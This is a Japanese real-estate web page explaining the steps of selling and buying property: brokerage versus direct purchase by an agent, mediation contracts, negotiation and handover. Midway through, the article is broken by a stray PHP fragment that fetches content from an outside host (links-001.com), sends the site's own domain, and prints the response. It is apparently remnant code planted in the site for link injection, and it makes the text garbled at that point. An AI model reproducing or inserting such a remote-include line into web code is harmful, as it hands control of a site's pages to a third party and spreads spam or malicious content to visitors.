前へ
次へ

不動産物件の売買を完了させるなら

もし今、不動産物件の売買を完了させたいと感じているなら、ひとまずどこの業者に声をかけるべきなのかを落

more

じっくりと行いたい不動産売買

基本的に不動産売買に関しては、特定の仲介業者を通してじっくりと行うことが重要となります。
どこ

more

上手に不動産の売買を済ませるためにも

トラブルなく、上手に不動産売買をスムーズに済ませたいと感じているのであれば、とりあえず、それをしっか

more

大まかな流れを知り不動産売買に備えよう

自宅を売って次の物件を購入する資金にしたい、収益物件に使えそうな住宅を購入したい等不動産売買を考えている人もいるのではないでしょうか。
まず不動産を売却したいと思う際ですが、どのような方法で売却するかを決めます。
知り合いと個人的なやり取りをするという場合もありますが、多くの場合は業者を介した取引になる事も多いです。
その業者に依頼をする際にも、売買の仲介をしてもらうかその業者に物件を買取をしてもらうかの2通りの方法が存在します。
この時注意して欲しいのが、業者に買取をしてもらう方法だと仲介をしてもらう時の売却額よりも安くなってしまうという点に注意が必要です。
そして実際に媒介契約という仲介の依頼を行い、自社サイト等への物件の掲載をはじめ売りに出します。
そして買いたいという人が来たら物件内を紹介し、条件交渉等に入っていきます。
この際に業者に依頼をしている場合はそうした業務も同時に行ってくれます。
そして双方が合意に至れば代金を受け取り、物件の引き渡しを行います。
契約から代金が手に入るまでには約1か月程度かかるとされているので、余裕を持って行動しましょう。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

では、物件を購入したいという時の流れはどうなのでしょうか。
まずはその物件が分譲か仲介かという点を確認します。
分譲物件は業者から物件を直接購入する方式で、仲介は間に業者を挟んで個人の売主から購入する方法です。
中古物件の場合はほとんどが仲介物件となります。
分譲物件の場合は業者との契約になるので業者と話し合いをして契約に至りますが、仲介の場合は業者を挟んで様々な交渉をする可能性があります。
個人との交渉の項目は値段交渉から引き渡し時期の交渉まで様々な点があります。
それら全てお互いの望む最大限の希望を通すことは難しくなるので、仲介業者等と共に折り合いをつける事が重要になります。
そうして折り合いが付いたら代金を支払い、所有権と鍵の受け取り、そして物件代金以外の諸費用を支払って晴れて物件を手に入れる事になります。

Page Top